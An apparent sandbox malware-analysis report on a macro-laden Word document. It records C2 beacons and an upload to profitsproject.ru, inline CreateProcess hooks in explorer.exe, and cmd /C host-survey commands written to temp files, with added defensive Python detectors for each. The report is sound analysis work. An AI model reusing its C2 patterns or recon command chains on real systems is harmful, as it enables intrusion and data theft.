                    Data Ascii: com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-


Session ID:2
Source IP:192.168.1.83
Source Port:49206
Destination IP:37.152.176.90
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:Mar 20, 2019 16:39:00.572242022 MEZ
kBytes transferred:812
Direction:OUT
Data:GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
                    Host: profitsproject.ru
Timestamp:Mar 20, 2019 16:39:01.055056095 MEZ
kBytes transferred:812
Direction:IN
Data:HTTP/1.1 200 OK
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:38:50 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 288
                    Connection: close
                    Data Raw: 0c de b3 bb ea 41 e6 2a ce d5 f6 1f 07 92 e4 88 04 3b cf 89 dc f4 b9 af f4 bd 6d ae a5 6d c3 a1 91 e7 e7 ed 67 33 5d 5b 1d d1 32 3c 51 e6 8f 33 82 a8 28 12 c1 9b 25 d5 5b 6f 4f ad e9 50 bd b8 97 e1 dc dd 7c 32 58 6f 5b 16 e5 00 4d c3 4f c4 bb d7 e0 56 6e 3e 4d 93 04 f2 08 05 24 ab 34 09 08 71 8e 20 6e 5e 30 2d 18 1c 3a 53 61 c1 9c 39 2f 5f 1e a5 61 54 fd e0 99 84 e2 b9 9f e6 d4 83 10 05 d3 6e 36 44 91 ee bb f1 ef 6a 8a bc 55 a7 7d 59 fe 79 01 22 97 04 ab ae f2 ef 02 4f b8 00 e9 7a fe ae 16 f1 74 ba 37 b3 8c 37 60 de d0 f6 a8 65 55 64 b0 82 fb 21 e1 1f 97 eb e1 4d 00 da 34 f9 71 09 a1 06 fd 35 5a 28 17 73 56 24 a9 e7 e2 97 60 11 90 f1 72 f2 92 86 d3 aa e6 da 7d e7 f2 2b 8c 51 31 d8 74 f2 b3 e3 45 68 7e 75 94 08 ec 51 fa 72 0b 5d f1 ef 0f 75 1b 87 1d 30 ae 2b 27 84 7f ab 76 74 fc 5a 95 8d 26 73 5c a4 a6 93 32 39 c1 81 a8 bd ae 1c af 7d 23 c5 a7 2b 2d 1e
                    Data Ascii: A*;mmg3][2<Q3(%[oOP|2Xo[MOVn>M$4q n^0-:Sa9/_aTn6DjU}Yy"Ozt77`eUd!M4q5Z(sV$`r}+Q1tEh~uQr]u0+'vtZ&s\29}#+-


Session ID:3
Source IP:192.168.1.83
Source Port:49207
Destination IP:46.139.176.151
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:Mar 20, 2019 16:39:11.897363901 MEZ
kBytes transferred:814
Direction:OUT
Data:POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Content-Type: multipart/form-data; boundary=382116919742642393088
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
                    Content-Length: 401
                    Host: profitsproject.ru
Timestamp:Mar 20, 2019 16:39:11.897511005 MEZ
kBytes transferred:815
Direction:OUT
Data Raw: 2d 2d 33 38 32 31 31 36 39 31 39 37 34 32 36 34 32 33 39 33 30 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e
                    Data Ascii: --382116919742642393088Content-Disposition: form-data; name="upload_file"; filename="3E76.bin"[@6u&7teC'c@srbl9M*<{)9`te"y? Efz4- }xMvOrzq<Y
Timestamp:Mar 20, 2019 16:39:12.168243885 MEZ
kBytes transferred:815
Direction:IN
Data:HTTP/1.1 200 OK
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:39:01 GMT
                    Content-Type: text/html
                    Connection: close
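
The two requests to profitsproject.ru above carry their payload in the URI path rather than in the body: a cover directory ("images"), a dozen or more pseudo-random path segments, and a fake image extension (.gif on the GET, .bmp on the POST). Reading "_2B" and "_2F" as the base64 characters "+" and "/" (the percent-encodings %2B and %2F with "_" in place of "%"), stripping the slashes and the extension turns the GET path into exactly 192 characters of the base64 alphabet, a multiple of four, which supports that reading. The report does not state this encoding and does not identify the cipher under it, so the decoded bytes stay opaque here. The following is an added example, not the report's or the sample's code: a Python helper that reassembles the blob, checks it against the base64 alphabet, and a heuristic that flags request paths of this shape. The escape mapping, the segment threshold and the extension list are assumptions.

```python
import base64
import re

# Request paths copied from the two explorer.exe sessions above (constructed input, not live capture).
GET_PATH = ("/images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/"
            "JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/"
            "RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif")
POST_PATH = ("/images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/"
             "cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/"
             "5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp")

# Assumption: "_2B"/"_2F" stand for '+' and '/', the two base64 characters that are reserved in URLs.
ESCAPES = {"_2B": "+", "_2F": "/"}
FAKE_IMAGE_EXT = re.compile(r"\.(gif|bmp|jpe?g|png)$", re.I)
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+")


def reassemble_blob(path):
    """Drop the cover directory and the fake extension, join the segments, undo the escapes."""
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if len(segments) < 2:
        return None
    body = segments[1:]                      # segments[0] is the cover directory ("images")
    body[-1] = FAKE_IMAGE_EXT.sub("", body[-1])
    blob = "".join(body)
    for esc, ch in ESCAPES.items():
        blob = blob.replace(esc, ch)
    return blob


def is_base64_alphabet(blob):
    return blob is not None and B64_ALPHABET.fullmatch(blob) is not None


def decode_blob(blob):
    """Base64-decode with padding restored; the result is still ciphertext the report does not unpack."""
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def looks_like_encoded_request(path, min_segments=8):
    """Heuristic for this URI shape: many segments, an image extension, base64-alphabet text with escapes."""
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if len(segments) < min_segments or not FAKE_IMAGE_EXT.search(segments[-1]):
        return False
    blob = reassemble_blob(path)
    if not is_base64_alphabet(blob):
        return False
    has_escape = any(esc in "".join(segments[1:]) for esc in ESCAPES)
    mixed = blob.lower() != blob and blob.upper() != blob and any(c.isdigit() for c in blob)
    return has_escape and mixed


if __name__ == "__main__":
    for label, path in (("GET", GET_PATH), ("POST", POST_PATH)):
        blob = reassemble_blob(path)
        print(label, len(blob), "chars ->", len(decode_blob(blob)), "bytes; flagged:",
              looks_like_encoded_request(path))
```

The heuristic is deliberately narrow (segment count, extension, alphabet, escapes, mixed case) so that ordinary CDN image paths such as the Google logo URLs in the 404 page above do not match; tune min_segments against your own proxy logs before deploying it.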


                    Code Manipulations

                    User Modules

                    Hook Summary

Function Name         Hook Type   Active in Processes
CreateProcessW        EAT         explorer.exe
CreateProcessW        INLINE      explorer.exe
CreateProcessA        EAT         explorer.exe
CreateProcessA        INLINE      explorer.exe
CreateProcessAsUserW  EAT         explorer.exe
CreateProcessAsUserW  INLINE      explorer.exe

                    Processes

                    Process: explorer.exe, Module: kernel32.dll
Function Name         Hook Type   New Data
CreateProcessW        EAT         75329000
CreateProcessW        INLINE      0xE9 0x9C 0xC7 0x74 0x48 0x8A
CreateProcessA        EAT         75329005
CreateProcessA        INLINE      0xE9 0x94 0x47 0x74 0x49 0x9A
CreateProcessAsUserW  EAT         7532900A
CreateProcessAsUserW  INLINE      0xE9 0x92 0x25 0x54 0x4A 0xAA
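
Each inline entry above begins with 0xE9, the x86 opcode for a 5-byte JMP rel32, which is the classic detour a user-mode hooking engine writes over the first instruction of an export; the three EAT entries are five bytes apart, consistent with a small table of such stubs. The report does not give the virtual addresses of the hooked exports, so the jump targets cannot be computed from the page. As an added example, not the report's or Joe Sandbox's code, the Python below shows the check a hook scanner performs: recognise the common stub shapes, resolve an E9 displacement relative to the function's address, and flag a first instruction that leaves its own module. The observed bytes are used only to confirm the opcode and displacement; the module range and addresses in the test data are hypothetical.

```python
import struct

# Inline hook bytes exactly as the table above lists them for explorer.exe / kernel32.dll.
OBSERVED_INLINE = {
    "CreateProcessW":       bytes([0xE9, 0x9C, 0xC7, 0x74, 0x48, 0x8A]),
    "CreateProcessA":       bytes([0xE9, 0x94, 0x47, 0x74, 0x49, 0x9A]),
    "CreateProcessAsUserW": bytes([0xE9, 0x92, 0x25, 0x54, 0x4A, 0xAA]),
}

# Hot-patchable prologue of Windows 7 era kernel32 exports: mov edi,edi / push ebp / mov ebp,esp.
CLEAN_PROLOGUE = bytes([0x8B, 0xFF, 0x55, 0x8B, 0xEC])


def classify_prologue(code):
    """Recognise the usual x86 detour stubs; returns (kind, operand) or (None, None)."""
    if len(code) >= 5 and code[0] == 0xE9:                              # jmp rel32
        return "jmp_rel32", struct.unpack_from("<i", code, 1)[0]
    if len(code) >= 6 and code[0:2] == b"\xFF\x25":                     # jmp dword ptr [abs32]
        return "jmp_indirect", struct.unpack_from("<I", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:          # push imm32 / ret
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 7 and code[0] == 0xB8 and code[5:7] == b"\xFF\xE0":  # mov eax,imm32 / jmp eax
        return "mov_jmp_eax", struct.unpack_from("<I", code, 1)[0]
    return None, None


def jmp_rel32_target(func_va, code):
    """Target of an E9 stub at func_va: address of the next instruction plus the signed displacement."""
    kind, rel = classify_prologue(code)
    if kind != "jmp_rel32":
        return None
    return (func_va + 5 + rel) & 0xFFFFFFFF


def make_jmp_rel32(from_va, to_va):
    """Build the 5-byte stub a hooking engine writes; used here to construct test data."""
    rel = (to_va - (from_va + 5)) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", rel)


def hook_verdict(func_va, code, module_range):
    """Flag an export whose first instruction transfers control outside its own module."""
    kind, operand = classify_prologue(code)
    if kind is None:
        return "clean"
    if kind == "jmp_indirect":
        # The real target sits in memory at `operand`; resolve it from the process, not from the bytes.
        return "hooked:jmp_indirect"
    target = jmp_rel32_target(func_va, code) if kind == "jmp_rel32" else operand
    lo, hi = module_range
    if lo <= target < hi:
        return "intra_module:%s" % kind
    return "hooked:%s->0x%08X" % (kind, target)


if __name__ == "__main__":
    for name, code in OBSERVED_INLINE.items():
        kind, rel = classify_prologue(code)
        print("%-20s %s rel32=0x%08X" % (name, kind, rel & 0xFFFFFFFF))
```

In practice the module range comes from the loaded-module list of the inspected process and the bytes from ReadProcessMemory (or a memory dump); comparing them against the on-disk export prologue, as the CLEAN_PROLOGUE constant does here, catches stubs that this opcode table does not know.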

                    Statistics

                    CPU Usage

                    Memory Usage

                    High Level Behavior Distribution

                    Behavior

                    System Behavior

                    General

                    Start time:16:37:56
                    Start date:20/03/2019
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Imagebase:0x2f470000
                    File size:1423008 bytes
                    MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:38:10
                    Start date:20/03/2019
                    Path:C:\Users\user\text.doc.16147.scr
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\text.doc.16147.scr
                    Imagebase:0x400000
                    File size:783857 bytes
                    MD5 hash:2481F6BE75307B79607D12114D2B6102
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:38:54
                    Start date:20/03/2019
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0xa60000
                    File size:2972672 bytes
                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
                    Imagebase:0x4a2a0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\nslookup.exe
                    Wow64 process (32bit):false
                    Commandline:nslookup myip.opendns.com resolver1.opendns.com
                    Imagebase:0xa20000
                    File size:98304 bytes
                    MD5 hash:5E3830EE3282A53920E00784FEC44CFD
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
                    Imagebase:0x49df0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:21
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4acc0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:21
                    Start date:20/03/2019
                    Path:C:\Windows\System32\systeminfo.exe
                    Wow64 process (32bit):false
                    Commandline:systeminfo.exe
                    Imagebase:0x9f0000
                    File size:75776 bytes
                    MD5 hash:258B2ED54FC7F74E2FDCCE5861549C1A
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:28
                    Start date:20/03/2019
                    Path:C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
                    Imagebase:0x400000
                    File size:783857 bytes
                    MD5 hash:2481F6BE75307B79607D12114D2B6102
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x49da0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a870000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\net.exe
                    Wow64 process (32bit):false
                    Commandline:net view
                    Imagebase:0x160000
                    File size:46080 bytes
                    MD5 hash:B9A4DAC2192FD78CDA097BFA79F6E7B2
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a040000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4acd0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\nslookup.exe
                    Wow64 process (32bit):false
                    Commandline:nslookup 127.0.0.1
                    Imagebase:0x4e0000
                    File size:98304 bytes
                    MD5 hash:5E3830EE3282A53920E00784FEC44CFD
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a220000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:41
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a8e0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:41
                    Start date:20/03/2019
                    Path:C:\Windows\System32\tasklist.exe
                    Wow64 process (32bit):false
                    Commandline:tasklist.exe /SVC
                    Imagebase:0x490000
                    File size:80896 bytes
                    MD5 hash:A9A00E71E3DD67B029FC904FE3BB61DA
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a7b0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a460000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\driverquery.exe
                    Wow64 process (32bit):false
                    Commandline:driverquery.exe
                    Imagebase:0x940000
                    File size:66048 bytes
                    MD5 hash:5D1CFD8CF86F05BB27926C9A6893B635
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
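
Most of the child processes listed above are cmd /C wrappers that run host-survey tools and redirect their output into two files under %TEMP% (22E8.bi1 for the external-IP lookup, 152E.bin1 for systeminfo, net view, nslookup, tasklist /SVC and driverquery), with echo lines as separators between sections. The following is an added example, not the report's or the sandbox's code: a Python detector that parses command lines of this shape, groups them by redirect target, flags a file fed by three or more distinct survey tools, and separately flags nslookup against myip.opendns.com, the usual way to learn the egress address without a dedicated beacon. The command lines are copied from the process list (the report prints them with single quotes, so both quote styles are accepted); the tool list and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Command lines copied from the process list above (constructed input for this example).
OBSERVED_CMDLINES = [
    r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'",
    r"cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'",
    r"cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
    r"cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'",
]

# Host-survey tools whose combined output, written into one file, is worth an alert (assumed list).
RECON_TOOLS = {"systeminfo", "net", "nslookup", "tasklist", "driverquery",
               "whoami", "ipconfig", "netstat", "arp", "route", "qprocess", "query"}

_WRAPPER = re.compile(r"""^\s*"?(?:\S*\\)?cmd(?:\.exe)?"?\s+/c\s+(?P<q>['"])(?P<body>.*)(?P=q)\s*$""",
                      re.I | re.S)
_REDIRECT = re.compile(r"^(?P<cmd>.*?)\s*(?P<op>>>?)\s*(?P<target>\S+)\s*$", re.S)


def parse_cmdline(cmdline):
    """Split `cmd /C '<tool> <args> >[>] <file>'` into its parts; None if it is not that shape."""
    m = _WRAPPER.match(cmdline)
    body = m.group("body") if m else cmdline
    r = _REDIRECT.match(body)
    if not r:
        return None
    tokens = r.group("cmd").split()
    if not tokens:
        return None
    tool = tokens[0].rsplit("\\", 1)[-1].lower()
    if tool.endswith(".exe"):
        tool = tool[:-4]
    return {"tool": tool, "args": tokens[1:], "append": r.group("op") == ">>",
            "target": r.group("target").lower()}


def group_recon_by_output(cmdlines):
    """Map each redirect target to the set of survey tools that wrote into it."""
    groups = defaultdict(set)
    for line in cmdlines:
        p = parse_cmdline(line)
        if p and p["tool"] in RECON_TOOLS:
            groups[p["target"]].add(p["tool"])
    return groups


def find_recon_batches(cmdlines, min_tools=3):
    """Targets fed by at least `min_tools` distinct survey tools: the collect-into-one-file pattern."""
    return {t: sorted(tools) for t, tools in group_recon_by_output(cmdlines).items()
            if len(tools) >= min_tools}


def find_external_ip_lookups(cmdlines):
    """nslookup of a public 'what is my IP' name reveals the egress address without any HTTP beacon."""
    return [p for p in map(parse_cmdline, cmdlines)
            if p and p["tool"] == "nslookup" and any("myip.opendns.com" in a.lower() for a in p["args"])]


if __name__ == "__main__":
    for target, tools in find_recon_batches(OBSERVED_CMDLINES).items():
        print("recon batch ->", target, tools)
    for hit in find_external_ip_lookups(OBSERVED_CMDLINES):
        print("external IP lookup ->", hit["target"])
```

Fed from a process-creation source (Sysmon event 1 or the 4688 command line), the grouping by redirect target is what separates this pattern from an administrator running systeminfo once; the separator echo lines are ignored for scoring but confirm that one parent is assembling a single report file.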

                    Disassembly

                    Code Analysis

                    Call Graph

                    Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
callgraph (flattened in the original; each node is "id function APIs:count", each edge is caller -> callee):
8154 Document_Open  CStr:1, Environ:2
2    x              CStr:1
789  I8BD2          send:1, Open:1
4757 test1          CreateObject:1, UBound:2
7646 sh1            Shell:1
8394 BjOEsxO3       Asc:1, Len:1, Mid:1, Chr:1
1955 test1          CreateObject:1, UBound:2
4263 sh1            Shell:1
Edges: 8154 -> 2, 2 -> 789, 2 -> 4757, 2 -> 7646, 2 -> 8394

                    Module: J04Xt

                    Declaration
Line  Content
1     Attribute VB_Name = "J04Xt"

                    Executed Functions
APIs  Meta Information

                    Ik728

                    A014z

                    UrERz

                    Part of subcall function BjOEsxO3@U2YLn: OCkrm

                    Part of subcall function BjOEsxO3@U2YLn: AST0b

                    Part of subcall function BjOEsxO3@U2YLn: ZYu1R

                    Part of subcall function BjOEsxO3@U2YLn: HsaCb

                    Part of subcall function BjOEsxO3@U2YLn: Len

                    Part of subcall function BjOEsxO3@U2YLn: BbA1x

                    Part of subcall function BjOEsxO3@U2YLn: Chr

                    Part of subcall function BjOEsxO3@U2YLn: Asc

                    Part of subcall function BjOEsxO3@U2YLn: Mid

                    Part of subcall function BjOEsxO3@U2YLn: OjKf2

                    YcIPR

                    MRbO5

                    Part of subcall function I8BD2@JtuJu: VKsr5

                    Part of subcall function I8BD2@JtuJu: VFDa2

                    Part of subcall function I8BD2@JtuJu: QGdom

                    Part of subcall function I8BD2@JtuJu: TO8KM

                    Part of subcall function I8BD2@JtuJu: H87Y8

                    Part of subcall function I8BD2@JtuJu: XPcZ8

                    Part of subcall function I8BD2@JtuJu: Wt628

                    Part of subcall function I8BD2@JtuJu: Open

                    Part of subcall function I8BD2@JtuJu: Lyu7w

                    Part of subcall function I8BD2@JtuJu: YT4R3

                    Part of subcall function I8BD2@JtuJu: ECehc

                    Part of subcall function I8BD2@JtuJu: CTt54

                    Part of subcall function I8BD2@JtuJu: send

                    Part of subcall function I8BD2@JtuJu: IO4H1

                    Part of subcall function I8BD2@JtuJu: DMpT6

                    Part of subcall function I8BD2@JtuJu: V6si1

                    Part of subcall function I8BD2@JtuJu: WlH6E

                    Part of subcall function I8BD2@JtuJu: JNo8v

                    Part of subcall function I8BD2@JtuJu: D7Hyo

                    Part of subcall function I8BD2@JtuJu: responseBody

                    Part of subcall function I8BD2@JtuJu: FuUpS

                    Part of subcall function I8BD2@JtuJu: G065k

                    Part of subcall function I8BD2@JtuJu: FG3dN

                    CStr

                    NIuZE

                    EP2DB

                    ZvDa2

                    Part of subcall function test1@ThisDocument: JiIyy

                    Part of subcall function test1@ThisDocument: I70P3

                    Part of subcall function test1@ThisDocument: HZibc

                    Part of subcall function test1@ThisDocument: BcLv2

                    Part of subcall function test1@ThisDocument: C0Vfq

                    Part of subcall function test1@ThisDocument: BxYtT

                    Part of subcall function test1@ThisDocument: OhAx1

                    Part of subcall function test1@ThisDocument: NzkP8

                    Part of subcall function test1@ThisDocument: Eg1q6

                    Part of subcall function test1@ThisDocument: F2gVH

                    Part of subcall function test1@ThisDocument: LKbGd

                    Part of subcall function test1@ThisDocument: G1jcm

Part of subcall function test1@ThisDocument: GE8D2, CySUV, W8fJH, D18NP, RzEI8, FG8Ql, Us6o1, Z2VyP, CFq3n, UDtTh, D6zNx, NGKGP, Y2Jti, GLr0d, MvykX, JS08j, N6b2y, Ace62, A7h7X, US5tA, R0be7, UBound, UBound, A7fA2, Pt7t4, O5Fw8, K83vS, Nzfy5, XBsOm, LBzBN, Bpcx3, B2864, B3Q2l, A35Ls, N578T, Open, U3038, Y0SFj, EqDjd, J6Xnm, Gn0p5, X6RIx, TyTNz
Part of subcall function sh1@ThisDocument: H0M0p, Kh1g3, W4t1q, K1jv6, W10rU, WK0I3, Shell, Yi5qQ, Td518, G4mfw
G0d64, W362Y, GjaAA

Strings: Decrypted Strings
"P3Wdq", "Q13rR", "Qjod7", "Z65y7", "Ph5Xn",
"kwws=2264147;154<14962lpdjhv2orjr51sqj",
"PGNG2", "Um550", "P8VN5", "HEV04", "Fgnvk", "EMy1m", "J6DD5", "AsukH", "MqXa4", "CA6bX"

Line  Instruction                                         Meta Information
  2   Sub x(H3450 as String)
  3   Dim Wcw23 as Long                                   executed
  4   Wcw23 = (902 + 159) / 43
  5   Dim Vplft(6 To 253) as Long
  6   Vplft(6) = (- 110 + 845) + 33
  7   Dim E5j8d as Long
  8   E5j8d = (- 602 - 950) - 18
  9   Dim KKDAG(84) as Byte
 10   KKDAG(84) = 140
 11   Dim JPF2q as String
 12   JPF2q = "P3Wdq"
 13   Dim UrUg6 as String
 14   UrUg6 = "Q13rR"
 15   Dim Qg0lj(3 To 311) as Long
